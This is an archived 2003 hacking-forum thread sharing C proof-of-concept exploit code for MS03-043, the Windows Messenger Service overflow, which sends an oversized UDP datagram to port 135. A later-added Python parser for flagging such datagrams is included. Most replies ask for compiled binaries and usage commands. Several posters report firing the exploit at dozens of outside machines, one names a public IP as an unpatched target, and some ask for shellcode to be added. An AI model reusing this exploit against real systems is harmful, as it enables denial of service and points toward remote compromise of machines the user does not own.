Full Version: Code For Ms03-043
kyprizel
Men, just look at

memset(body,0x14,sizeof(body));

in the code, and look at the exploit's header....
jsands
/* Header comment truncated in this copy of the post; the code follows. */

#include <stdio.h>
#include <stdlib.h>   /* exit(), EXIT_SUCCESS / EXIT_FAILURE */
#include <winsock.h>
#include <string.h>
#include <time.h>

#pragma comment(lib, "ws2_32.lib")   /* Winsock import library for Visual C++ */

// Packet format found thanks to a bit of sniffing
static unsigned char packet_header[] =
    "\x04\x00\x28\x00"
    "\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    "\x00\x00\x00\x00\xf8\x91\x7b\x5a\x00\xff\xd0\x11\xa9\xb2\x00\xc0"
    "\x4f\xb6\xe6\xfc"
    "\xff\xff\xff\xff" // @40 : unique id over 16 bytes ?
    "\xff\xff\xff\xff"
    "\xff\xff\xff\xff"
    "\xff\xff\xff\xff"
    "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
    "\x00\x00\xff\xff\xff\xff"
    "\xff\xff\xff\xff" // @74 : fields length
    "\x00\x00";

// Each field is prefixed by a 12-byte header carrying its length twice
unsigned char field_header[] =
    "\xff\xff\xff\xff" // @0 : field length
    "\x00\x00\x00\x00"
    "\xff\xff\xff\xff"; // @8 : field length

int main(int argc, char *argv[])
{
    int i, packet_size, fields_size, s;
    unsigned char packet[8192];
    struct sockaddr_in addr;
    // A few conditions :
    // 0 <= strlen(from) + strlen(machine) <= 56
    // max fields size 3992
    char from[] = "RECCA";
    char machine[] = "ZEUS";
    char body[4096] = "*** MESSAGE ***";

    WSADATA wsaData;

    WSAStartup(0x0202, &wsaData);

    // Target address is hard-coded; UDP/135 is the Messenger service endpoint
    ZeroMemory(&addr, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_addr.s_addr = inet_addr("192.168.186.3");
    addr.sin_port = htons(135);

    ZeroMemory(packet, sizeof(packet));
    packet_size = 0;

    // Fixed header (sizeof - 1 drops the string literal's terminating NUL)
    memcpy(&packet[packet_size], packet_header, sizeof(packet_header) - 1);
    packet_size += sizeof(packet_header) - 1;

    // Field 1: sender name
    i = strlen(from) + 1;
    *(unsigned int *)(&field_header[0]) = i;
    *(unsigned int *)(&field_header[8]) = i;
    memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);
    packet_size += sizeof(field_header) - 1;
    strcpy((char *)&packet[packet_size], from);
    packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4

    // Field 2: destination machine name
    i = strlen(machine) + 1;
    *(unsigned int *)(&field_header[0]) = i;
    *(unsigned int *)(&field_header[8]) = i;
    memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);
    packet_size += sizeof(field_header) - 1;
    strcpy((char *)&packet[packet_size], machine);
    packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4

    // Field 3: body, filled with 0x14 up to the 3992-byte fields ceiling
    fprintf(stdout, "Max 'body' size (incl. terminal NULL char) = %d\n",
            (int)(3992 - packet_size + sizeof(packet_header) - sizeof(field_header)));
    memset(body, 0x14, sizeof(body));
    body[3992 - packet_size + sizeof(packet_header) - sizeof(field_header) - 1] = '\0';

    i = strlen(body) + 1;
    *(unsigned int *)(&field_header[0]) = i;
    *(unsigned int *)(&field_header[8]) = i;
    memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);
    packet_size += sizeof(field_header) - 1;
    strcpy((char *)&packet[packet_size], body);
    packet_size += i;

    // Patch the unique id and the total size of the fields area into the header
    fields_size = packet_size - (sizeof(packet_header) - 1);
    *(unsigned int *)(&packet[40]) = (unsigned int)time(NULL);
    *(unsigned int *)(&packet[74]) = fields_size;

    fprintf(stdout, "Total length of strings = %d\nPacket size = %d\nFields size = %d\n",
            (int)(strlen(from) + strlen(machine) + strlen(body)), packet_size, fields_size);

    /*
    // Hex dump of the finished datagram (disabled)
    for (i = 0; i < packet_size; i++)
    {
        if (i && ((i & 1) == 0))
            fprintf(stdout, " ");
        if (i && ((i & 15) == 0))
            fprintf(stdout, "\n");
        fprintf(stdout, "%02x", packet[i]);
    }
    fprintf(stdout, "\n");
    */
    if ((s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1)
        exit(EXIT_FAILURE);

    if (sendto(s, (const char *)packet, packet_size, 0, (struct sockaddr *)&addr, sizeof(addr)) == -1)
        exit(EXIT_FAILURE);
    /*
    if (recvfrom(s, (char *)packet, sizeof(packet) - 1, 0, NULL, NULL) == -1)
        exit(EXIT_FAILURE);
    */

    exit(EXIT_SUCCESS);
}
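As an added example, not code from the post above or its author: a parser for the datagram layout that the PoC's comments describe (84-byte header, id at offset 40, fields length at offset 74, then 12-byte field headers that carry the field length twice, with each field padded to a multiple of 4), used as a defensive check over captured UDP/135 payloads. The offsets and the limits (fields area at most 3992 bytes, sender plus machine name at most 56 bytes) are the ones the PoC states; the sample datagrams, the builder that produces them and the classification strings are constructed here for illustration.

```python
import struct

# Layout constants, taken from the comments in the PoC above
HEADER_LEN = 84           # sizeof(packet_header) - 1
FIELD_HDR_LEN = 12        # sizeof(field_header) - 1
ID_OFFSET = 40            # "@40 : unique id"
FIELDS_SIZE_OFFSET = 74   # "@74 : fields length"
MAX_FIELDS_SIZE = 3992    # "max fields size 3992"
MAX_NAMES_LEN = 56        # strlen(from) + strlen(machine) <= 56


def parse_messenger_datagram(data):
    """Return (unique_id, fields_size, [raw field bytes]) or raise ValueError."""
    if len(data) < HEADER_LEN:
        raise ValueError("datagram shorter than the %d-byte header" % HEADER_LEN)
    unique_id = struct.unpack_from("<I", data, ID_OFFSET)[0]
    fields_size = struct.unpack_from("<I", data, FIELDS_SIZE_OFFSET)[0]
    end = HEADER_LEN + fields_size
    if end > len(data):
        raise ValueError("declared fields size %d runs past the datagram" % fields_size)
    fields = []
    off = HEADER_LEN
    while off + FIELD_HDR_LEN <= end:
        length, _, length2 = struct.unpack_from("<III", data, off)
        if length != length2:
            raise ValueError("the two length words disagree at offset %d" % off)
        off += FIELD_HDR_LEN
        if off + length > end:
            raise ValueError("field of %d bytes runs past the fields area" % length)
        fields.append(data[off:off + length])
        # fields are padded to a multiple of 4; the last one may end unpadded
        off = min(off + ((length + 3) & ~3), end)
    return unique_id, fields_size, fields


def classify(data):
    """Constructed triage verdict: 'ok', 'suspicious: ...' or 'malformed: ...'."""
    try:
        _, fields_size, fields = parse_messenger_datagram(data)
    except ValueError as exc:
        return "malformed: " + str(exc)
    if len(fields) != 3:
        return "suspicious: %d fields, expected from/machine/body" % len(fields)
    names = sum(len(f.rstrip(b"\x00")) for f in fields[:2])
    if names > MAX_NAMES_LEN:
        return "suspicious: sender+machine names total %d bytes" % names
    if fields_size >= MAX_FIELDS_SIZE:
        return "suspicious: fields area %d bytes reaches the %d ceiling" % (
            fields_size, MAX_FIELDS_SIZE)
    return "ok"


def sample_datagram(sender, machine, body):
    """Constructed test input in the PoC's layout (header bytes are dummies)."""
    header = bytearray(HEADER_LEN)
    header[0:4] = b"\x04\x00\x28\x00"
    parts = []
    for text in (sender, machine, body):
        raw = text + b"\x00"
        padded = raw.ljust((len(raw) + 3) & ~3, b"\x00")
        parts.append(struct.pack("<III", len(raw), 0, len(raw)) + padded)
    fields = b"".join(parts)
    struct.pack_into("<I", header, ID_OFFSET, 0x12345678)   # dummy id
    struct.pack_into("<I", header, FIELDS_SIZE_OFFSET, len(fields))
    return bytes(header) + fields


if __name__ == "__main__":
    print(classify(sample_datagram(b"ALICE", b"BOB", b"hello")))
    print(classify(sample_datagram(b"RECCA", b"ZEUS", b"\x14" * 3939)))
```

With the PoC's own values (RECCA, ZEUS, a 3939-byte body) the fields area comes to exactly 3992 bytes, which is the "Fields size = 3992" figure quoted later in the thread, so the ceiling check is what separates that datagram from an ordinary short message.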
jsands
Pretty sure this is the code. If someone could, compile an exe for me; I'm too lazy.
z0mbi3
using visual c++
FxF
What is the command for msg.exe? And is it an exploit for the new Messenger hole?


thx

FxF
xaph
QUOTE (yamaraj @ Oct 19 2003, 08:10 AM)
using visual c++

Hmmm, why is your exe 1xx kb big? Infected with a trojan?! Mine is just 30 kb....

Steve2017
Thanx 4 sharing, but how 2 use it?
ducky
Thanks for the exploits... just one question... is it the Messenger vuln. exploit??
elBartalo
I don't understand the exploit...
What is the command for this exploit?
How to scan for this bug? Portscan 135 and 139? Because it's the Microsoft Messenger Service...
mon
Actually, it is the Denial of Service code
http://www.security-corporation.com/downlo...t/ms03-043poc.c
thatsmej
QUOTE (elBartalo @ Oct 19 2003, 08:56 AM)
I don't understand the exploit...
What is the command for this exploit?
How to scan for this bug? Portscan 135 and 139? Because it's the Microsoft Messenger Service...

You'll find a scanner in the file downloads section.

There is no command for this code,
because the IP is built into the exe,

unless the guy changed the code to work (like me).
Flinston
It's just a DoS, not code execution, isn't it? o.O
jsands
The code is the overflow which gives you LocalSystem, but yes, also a DoS; it should reboot the computer, or that's what I read.
Flinston
In the MS bulletin a possible code execution was mentioned... is this possible with this code!?
ScriptGod
It uses the MS03-043 bug! But it doesn't execute code. It only kills the process with this bug, and the system restarts, like the DoS attack with the RPC bug.

But you need to compile it on your own, because there is an attack address in the code; you cannot change this address with a parameter.
thatsmej
QUOTE (ScriptGod @ Oct 19 2003, 11:08 AM)
It uses the MS03-043 bug! But it doesn't execute code. It only kills the process with this bug, and the system restarts, like the DoS attack with the RPC bug.

But you need to compile it on your own, because there is an attack address in the code; you cannot change this address with a parameter.

OK,
you forced me..

It's 160 kb,
because I only built the debug and not the release (too lazy).

command:
MS03_043_poc ip

Jeez,
no exe / no rar / zip is allowed?
element
How to use?????
Anarchy
I scanned lots of servers for ms03-043 with Retina MSGSVC.exe.
I tested the exp.exe:
ms03_043_cop.exe Remote ip
but nothing happened.
The server is alive, and nothing happened on it.
z0mbi3
QUOTE (xaph @ Oct 19 2003, 08:34 AM)
QUOTE (yamaraj @ Oct 19 2003, 08:10 AM)
using visual c++

Hmmm, why is your exe 1xx kb big? Infected with a trojan?! Mine is just 30 kb....

Hey dude, dunno about any trojan; I just copied the code into Visual C++, then compiled it, then uploaded the file from the debug folder.

Check the file before you use it if you don't believe me....

C ya
ScriptGod
QUOTE (Anarchy @ Oct 19 2003, 12:37 PM)
I scanned lots of servers for ms03-043 with Retina MSGSVC.exe.
I tested the exp.exe:
ms03_043_cop.exe Remote ip
but nothing happened.
The server is alive, and nothing happened on it.

Hmm, I haven't tested it against XP. It's possible that it works only against Win2K.

QUOTE

[...]
Tested against a Win2K SP4.
[...]
T3cHn0b0y
Flinston is right...

Impact of Vulnerability: Remote Code Execution

Microsoft Security Bulletin - MS03-043

Can anyone incorporate some shellcode into the exploit? I'm sure it'll only be a few days until it does come out.

I also tried the DoS attack... it works fine for me, although I see no purpose for it apart from shitting on someone you don't like.
Venom
jsands, please read the rules: no compiling requests.
jetprice
If you want to implement a shellcode yourself, you have to know how the code itself works... where is the EIP, how big is the buffer, and stuff like that... it is not done in 2 secs...

If you want to know more about this stuff, I suggest first learning C, then reading some articles on basic buffer overflows, going on to string buffer overflows and so on... something that you do in 1 year (then you are good).

My point, for those who don't know how it works: either start learning, or wait for the remote code execution source to come out.
SLiM577
Yea, I tested this on about 25 or so Win2K boxes myself; nothing happened, the box didn't reboot or anything =/
ComSec
QUOTE (jsands @ Oct 20 2003, 01:44 AM)
Sorry Venom, didn't really mean to request, I'm just lazy.

Read the rules jsands... a good job we're not lazy.... Warn points added.
jsands
Sorry Venom, didn't really mean to request, I'm just lazy.
ScriptGod
QUOTE (SLiM577 @ Oct 19 2003, 11:44 PM)
Yea, I tested this on about 25 or so Win2K boxes myself; nothing happened, the box didn't reboot or anything =/

Are you crazy? To post such a thing in a public forum? I hope you had the allowance to do that...

To the topic... I have compiled my version:
usage: MS03_043.exe TargetIP
VincentVega
Will this give a remote shell ScriptGod?

I will test it, thanks for sharing.
Susboy
Nope, still no luck. Tried all of the exe's. ((201.46.142.186 UNPATCHED (1026))

D:\Tools>MS03_043.exe
usage: MS03_043.exe <TargetIP>

D:\Tools>MS03_043.exe 201.46.142.186
Max 'body' size (incl. terminal NULL char) = 3940
Total length of strings = 3948
Packet size = 4072
Fields size = 3992

D:\Tools>

Did nothing.
jsands
Found a new code for this stupid shit; doubt it will work either, though. Wouldn't surprise me, shit already makes me feel like some type of lame ass as it is.
ScriptGod
No, this will only do a DoS attack on the victim. This is just the exploit with a parameter to set the target... it's not easy to add such a shell.

Well, it works on my local unpatched Win2K system. Try to use it 2 or 3 times; then the machine should restart after 120 seconds. But I haven't tested it on other systems. It's possible that this one will only work on Win2K systems.
ScriptGod
QUOTE (jsands @ Oct 20 2003, 08:04 AM)
Found a new code for this stupid shit; doubt it will work either, though. Wouldn't surprise me, shit already makes me feel like some type of lame ass as it is.

This seems to be the same exploit, only ported to Linux with command line switches added.
jetprice
QUOTE (ComSec @ Oct 20 2003, 09:14 AM)
QUOTE (jsands @ Oct 20 2003, 01:44 AM)
Sorry Venom, didn't really mean to request, I'm just lazy.

Read the rules jsands... a good job we're not lazy.... Warn points added.

I agree with you on this one. Personally, I think people who are lazy do not belong on this board; they are here for the wrong reasons (download exploits and hack other networks instead of their own networks)!

Hacking is illegal, people... and for the lazy people I really do hope the cops pass by to get your arse jailed. If you feel offended by this, so be it. I think this board is a really good source for sysops; I really feel sorry to read all those kiddie replies. Some don't even respect people if they filled their requests; wtf is wrong with you??? Even worse, some don't even know the basic MS-DOS / Linux commands!

So now that I was able to get this out, I hope some people will notice this and hopefully think it over before replying with "y0 y0u s1c|< b4st4rd, y0u ju57 41n7 1337 3n0ugh f0r 7h15 pl4c3!" As you can see, it's not hard to write your stupid slang.

Greets to people who use this site for good purposes and not for illegal activities like the FXP scene (hello, I know you are here).

PS: admins, I don't mind if you delete my reply because of some content that is not allowed... I just think these people (filtered) up your board with dumb and ungrounded replies.